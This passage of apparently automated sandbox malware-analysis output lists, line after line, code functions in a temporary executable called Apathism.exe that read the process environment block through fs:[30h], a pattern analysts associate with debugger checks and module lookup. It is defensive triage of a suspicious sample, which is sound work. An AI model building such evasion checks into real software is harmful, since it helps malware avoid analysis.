      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233A3C0 mov eax, dword ptr fs:[00000030h]7_2_2233A3C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223383C0 mov eax, dword ptr fs:[00000030h]7_2_223383C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223383C0 mov eax, dword ptr fs:[00000030h]7_2_223383C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223383C0 mov eax, dword ptr fs:[00000030h]7_2_223383C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223383C0 mov eax, dword ptr fs:[00000030h]7_2_223383C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B63C0 mov eax, dword ptr fs:[00000030h]7_2_223B63C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C6030 mov eax, dword ptr fs:[00000030h]7_2_223C6030
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232A020 mov eax, dword ptr fs:[00000030h]7_2_2232A020
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232C020 mov eax, dword ptr fs:[00000030h]7_2_2232C020
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234E016 mov eax, dword ptr fs:[00000030h]7_2_2234E016
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234E016 mov eax, dword ptr fs:[00000030h]7_2_2234E016
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234E016 mov eax, dword ptr fs:[00000030h]7_2_2234E016
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234E016 mov eax, dword ptr fs:[00000030h]7_2_2234E016
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B4000 mov ecx, dword ptr fs:[00000030h]7_2_223B4000
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D2000 mov eax, dword ptr fs:[00000030h]7_2_223D2000
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D2000 mov eax, dword ptr fs:[00000030h]7_2_223D2000
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D2000 mov eax, dword ptr fs:[00000030h]7_2_223D2000
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D2000 mov eax, dword ptr fs:[00000030h]7_2_223D2000
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D2000 mov eax, dword ptr fs:[00000030h]7_2_223D2000
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D2000 mov eax, dword ptr fs:[00000030h]7_2_223D2000
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D2000 mov eax, dword ptr fs:[00000030h]7_2_223D2000
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D2000 mov eax, dword ptr fs:[00000030h]7_2_223D2000
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235C073 mov eax, dword ptr fs:[00000030h]7_2_2235C073
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22332050 mov eax, dword ptr fs:[00000030h]7_2_22332050
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B6050 mov eax, dword ptr fs:[00000030h]7_2_223B6050
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F60B8 mov eax, dword ptr fs:[00000030h]7_2_223F60B8
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F60B8 mov ecx, dword ptr fs:[00000030h]7_2_223F60B8
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C80A8 mov eax, dword ptr fs:[00000030h]7_2_223C80A8
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233208A mov eax, dword ptr fs:[00000030h]7_2_2233208A
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232C0F0 mov eax, dword ptr fs:[00000030h]7_2_2232C0F0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223720F0 mov ecx, dword ptr fs:[00000030h]7_2_223720F0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232A0E3 mov ecx, dword ptr fs:[00000030h]7_2_2232A0E3
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223380E9 mov eax, dword ptr fs:[00000030h]7_2_223380E9
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B60E0 mov eax, dword ptr fs:[00000030h]7_2_223B60E0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B20DE mov eax, dword ptr fs:[00000030h]7_2_223B20DE
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22360124 mov eax, dword ptr fs:[00000030h]7_2_22360124
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DA118 mov ecx, dword ptr fs:[00000030h]7_2_223DA118
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DA118 mov eax, dword ptr fs:[00000030h]7_2_223DA118
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DA118 mov eax, dword ptr fs:[00000030h]7_2_223DA118
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DA118 mov eax, dword ptr fs:[00000030h]7_2_223DA118
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F0115 mov eax, dword ptr fs:[00000030h]7_2_223F0115
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DE10E mov eax, dword ptr fs:[00000030h]7_2_223DE10E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DE10E mov ecx, dword ptr fs:[00000030h]7_2_223DE10E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DE10E mov eax, dword ptr fs:[00000030h]7_2_223DE10E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DE10E mov eax, dword ptr fs:[00000030h]7_2_223DE10E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DE10E mov ecx, dword ptr fs:[00000030h]7_2_223DE10E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DE10E mov eax, dword ptr fs:[00000030h]7_2_223DE10E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DE10E mov eax, dword ptr fs:[00000030h]7_2_223DE10E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DE10E mov ecx, dword ptr fs:[00000030h]7_2_223DE10E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DE10E mov eax, dword ptr fs:[00000030h]7_2_223DE10E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DE10E mov ecx, dword ptr fs:[00000030h]7_2_223DE10E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232C156 mov eax, dword ptr fs:[00000030h]7_2_2232C156
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C8158 mov eax, dword ptr fs:[00000030h]7_2_223C8158
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22336154 mov eax, dword ptr fs:[00000030h]7_2_22336154
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22336154 mov eax, dword ptr fs:[00000030h]7_2_22336154
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C4144 mov eax, dword ptr fs:[00000030h]7_2_223C4144
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C4144 mov eax, dword ptr fs:[00000030h]7_2_223C4144
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C4144 mov ecx, dword ptr fs:[00000030h]7_2_223C4144
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C4144 mov eax, dword ptr fs:[00000030h]7_2_223C4144
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C4144 mov eax, dword ptr fs:[00000030h]7_2_223C4144
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B019F mov eax, dword ptr fs:[00000030h]7_2_223B019F
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B019F mov eax, dword ptr fs:[00000030h]7_2_223B019F
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B019F mov eax, dword ptr fs:[00000030h]7_2_223B019F
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B019F mov eax, dword ptr fs:[00000030h]7_2_223B019F
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232A197 mov eax, dword ptr fs:[00000030h]7_2_2232A197
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232A197 mov eax, dword ptr fs:[00000030h]7_2_2232A197
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232A197 mov eax, dword ptr fs:[00000030h]7_2_2232A197
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_224061E5 mov eax, dword ptr fs:[00000030h]7_2_224061E5
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22370185 mov eax, dword ptr fs:[00000030h]7_2_22370185
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223EC188 mov eax, dword ptr fs:[00000030h]7_2_223EC188
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223EC188 mov eax, dword ptr fs:[00000030h]7_2_223EC188
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D4180 mov eax, dword ptr fs:[00000030h]7_2_223D4180
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D4180 mov eax, dword ptr fs:[00000030h]7_2_223D4180
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223601F8 mov eax, dword ptr fs:[00000030h]7_2_223601F8
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AE1D0 mov eax, dword ptr fs:[00000030h]7_2_223AE1D0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AE1D0 mov eax, dword ptr fs:[00000030h]7_2_223AE1D0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AE1D0 mov ecx, dword ptr fs:[00000030h]7_2_223AE1D0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AE1D0 mov eax, dword ptr fs:[00000030h]7_2_223AE1D0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AE1D0 mov eax, dword ptr fs:[00000030h]7_2_223AE1D0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F61C3 mov eax, dword ptr fs:[00000030h]7_2_223F61C3
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F61C3 mov eax, dword ptr fs:[00000030h]7_2_223F61C3
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234E627 mov eax, dword ptr fs:[00000030h]7_2_2234E627
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22366620 mov eax, dword ptr fs:[00000030h]7_2_22366620
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22368620 mov eax, dword ptr fs:[00000030h]7_2_22368620
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233262C mov eax, dword ptr fs:[00000030h]7_2_2233262C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372619 mov eax, dword ptr fs:[00000030h]7_2_22372619
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AE609 mov eax, dword ptr fs:[00000030h]7_2_223AE609
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234260B mov eax, dword ptr fs:[00000030h]7_2_2234260B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234260B mov eax, dword ptr fs:[00000030h]7_2_2234260B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234260B mov eax, dword ptr fs:[00000030h]7_2_2234260B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234260B mov eax, dword ptr fs:[00000030h]7_2_2234260B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234260B mov eax, dword ptr fs:[00000030h]7_2_2234260B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234260B mov eax, dword ptr fs:[00000030h]7_2_2234260B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234260B mov eax, dword ptr fs:[00000030h]7_2_2234260B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22362674 mov eax, dword ptr fs:[00000030h]7_2_22362674
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F866E mov eax, dword ptr fs:[00000030h]7_2_223F866E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F866E mov eax, dword ptr fs:[00000030h]7_2_223F866E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236A660 mov eax, dword ptr fs:[00000030h]7_2_2236A660
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236A660 mov eax, dword ptr fs:[00000030h]7_2_2236A660
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2234C640 mov eax, dword ptr fs:[00000030h]7_2_2234C640
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223666B0 mov eax, dword ptr fs:[00000030h]7_2_223666B0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236C6A6 mov eax, dword ptr fs:[00000030h]7_2_2236C6A6
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22334690 mov eax, dword ptr fs:[00000030h]7_2_22334690
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22334690 mov eax, dword ptr fs:[00000030h]7_2_22334690
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AE6F2 mov eax, dword ptr fs:[00000030h]7_2_223AE6F2
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AE6F2 mov eax, dword ptr fs:[00000030h]7_2_223AE6F2
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AE6F2 mov eax, dword ptr fs:[00000030h]7_2_223AE6F2
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AE6F2 mov eax, dword ptr fs:[00000030h]7_2_223AE6F2
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B06F1 mov eax, dword ptr fs:[00000030h]7_2_223B06F1
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B06F1 mov eax, dword ptr fs:[00000030h]7_2_223B06F1
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236A6C7 mov ebx, dword ptr fs:[00000030h]7_2_2236A6C7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236A6C7 mov eax, dword ptr fs:[00000030h]7_2_2236A6C7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236273C mov eax, dword ptr fs:[00000030h]7_2_2236273C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236273C mov ecx, dword ptr fs:[00000030h]7_2_2236273C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236273C mov eax, dword ptr fs:[00000030h]7_2_2236273C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AC730 mov eax, dword ptr fs:[00000030h]7_2_223AC730
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236C720 mov eax, dword ptr fs:[00000030h]7_2_2236C720
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236C720 mov eax, dword ptr fs:[00000030h]7_2_2236C720
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22330710 mov eax, dword ptr fs:[00000030h]7_2_22330710
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22360710 mov eax, dword ptr fs:[00000030h]7_2_22360710
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236C700 mov eax, dword ptr fs:[00000030h]7_2_2236C700
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22338770 mov eax, dword ptr fs:[00000030h]7_2_22338770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340770 mov eax, dword ptr fs:[00000030h]7_2_22340770
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22330750 mov eax, dword ptr fs:[00000030h]7_2_22330750
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BE75D mov eax, dword ptr fs:[00000030h]7_2_223BE75D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372750 mov eax, dword ptr fs:[00000030h]7_2_22372750
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22372750 mov eax, dword ptr fs:[00000030h]7_2_22372750
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B4755 mov eax, dword ptr fs:[00000030h]7_2_223B4755
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236674D mov esi, dword ptr fs:[00000030h]7_2_2236674D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236674D mov eax, dword ptr fs:[00000030h]7_2_2236674D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236674D mov eax, dword ptr fs:[00000030h]7_2_2236674D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223307AF mov eax, dword ptr fs:[00000030h]7_2_223307AF
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E47A0 mov eax, dword ptr fs:[00000030h]7_2_223E47A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D678E mov eax, dword ptr fs:[00000030h]7_2_223D678E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223347FB mov eax, dword ptr fs:[00000030h]7_2_223347FB
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223347FB mov eax, dword ptr fs:[00000030h]7_2_223347FB
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223527ED mov eax, dword ptr fs:[00000030h]7_2_223527ED
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223527ED mov eax, dword ptr fs:[00000030h]7_2_223527ED
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223527ED mov eax, dword ptr fs:[00000030h]7_2_223527ED
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BE7E1 mov eax, dword ptr fs:[00000030h]7_2_223BE7E1
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233C7C0 mov eax, dword ptr fs:[00000030h]7_2_2233C7C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B07C3 mov eax, dword ptr fs:[00000030h]7_2_223B07C3
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236A430 mov eax, dword ptr fs:[00000030h]7_2_2236A430
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232E420 mov eax, dword ptr fs:[00000030h]7_2_2232E420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232E420 mov eax, dword ptr fs:[00000030h]7_2_2232E420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232E420 mov eax, dword ptr fs:[00000030h]7_2_2232E420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232C427 mov eax, dword ptr fs:[00000030h]7_2_2232C427
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B6420 mov eax, dword ptr fs:[00000030h]7_2_223B6420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B6420 mov eax, dword ptr fs:[00000030h]7_2_223B6420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B6420 mov eax, dword ptr fs:[00000030h]7_2_223B6420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B6420 mov eax, dword ptr fs:[00000030h]7_2_223B6420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B6420 mov eax, dword ptr fs:[00000030h]7_2_223B6420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B6420 mov eax, dword ptr fs:[00000030h]7_2_223B6420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B6420 mov eax, dword ptr fs:[00000030h]7_2_223B6420
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22368402 mov eax, dword ptr fs:[00000030h]7_2_22368402
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22368402 mov eax, dword ptr fs:[00000030h]7_2_22368402
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22368402 mov eax, dword ptr fs:[00000030h]7_2_22368402
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235A470 mov eax, dword ptr fs:[00000030h]7_2_2235A470
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235A470 mov eax, dword ptr fs:[00000030h]7_2_2235A470
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235A470 mov eax, dword ptr fs:[00000030h]7_2_2235A470
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BC460 mov ecx, dword ptr fs:[00000030h]7_2_223BC460
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223EA456 mov eax, dword ptr fs:[00000030h]7_2_223EA456
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235245A mov eax, dword ptr fs:[00000030h]7_2_2235245A
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E443 mov eax, dword ptr fs:[00000030h]7_2_2236E443
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E443 mov eax, dword ptr fs:[00000030h]7_2_2236E443
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E443 mov eax, dword ptr fs:[00000030h]7_2_2236E443
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E443 mov eax, dword ptr fs:[00000030h]7_2_2236E443
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E443 mov eax, dword ptr fs:[00000030h]7_2_2236E443
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E443 mov eax, dword ptr fs:[00000030h]7_2_2236E443
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E443 mov eax, dword ptr fs:[00000030h]7_2_2236E443
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E443 mov eax, dword ptr fs:[00000030h]7_2_2236E443
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223644B0 mov ecx, dword ptr fs:[00000030h]7_2_223644B0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BA4B0 mov eax, dword ptr fs:[00000030h]7_2_223BA4B0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223364AB mov eax, dword ptr fs:[00000030h]7_2_223364AB
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223EA49A mov eax, dword ptr fs:[00000030h]7_2_223EA49A
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223304E5 mov ecx, dword ptr fs:[00000030h]7_2_223304E5
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340535 mov eax, dword ptr fs:[00000030h]7_2_22340535
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340535 mov eax, dword ptr fs:[00000030h]7_2_22340535
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340535 mov eax, dword ptr fs:[00000030h]7_2_22340535
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340535 mov eax, dword ptr fs:[00000030h]7_2_22340535
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340535 mov eax, dword ptr fs:[00000030h]7_2_22340535
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340535 mov eax, dword ptr fs:[00000030h]7_2_22340535
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E53E mov eax, dword ptr fs:[00000030h]7_2_2235E53E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E53E mov eax, dword ptr fs:[00000030h]7_2_2235E53E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E53E mov eax, dword ptr fs:[00000030h]7_2_2235E53E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E53E mov eax, dword ptr fs:[00000030h]7_2_2235E53E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E53E mov eax, dword ptr fs:[00000030h]7_2_2235E53E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C6500 mov eax, dword ptr fs:[00000030h]7_2_223C6500
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22404500 mov eax, dword ptr fs:[00000030h]7_2_22404500
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22404500 mov eax, dword ptr fs:[00000030h]7_2_22404500
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22404500 mov eax, dword ptr fs:[00000030h]7_2_22404500
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22404500 mov eax, dword ptr fs:[00000030h]7_2_22404500
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22404500 mov eax, dword ptr fs:[00000030h]7_2_22404500
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22404500 mov eax, dword ptr fs:[00000030h]7_2_22404500
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22404500 mov eax, dword ptr fs:[00000030h]7_2_22404500
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236656A mov eax, dword ptr fs:[00000030h]7_2_2236656A
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236656A mov eax, dword ptr fs:[00000030h]7_2_2236656A
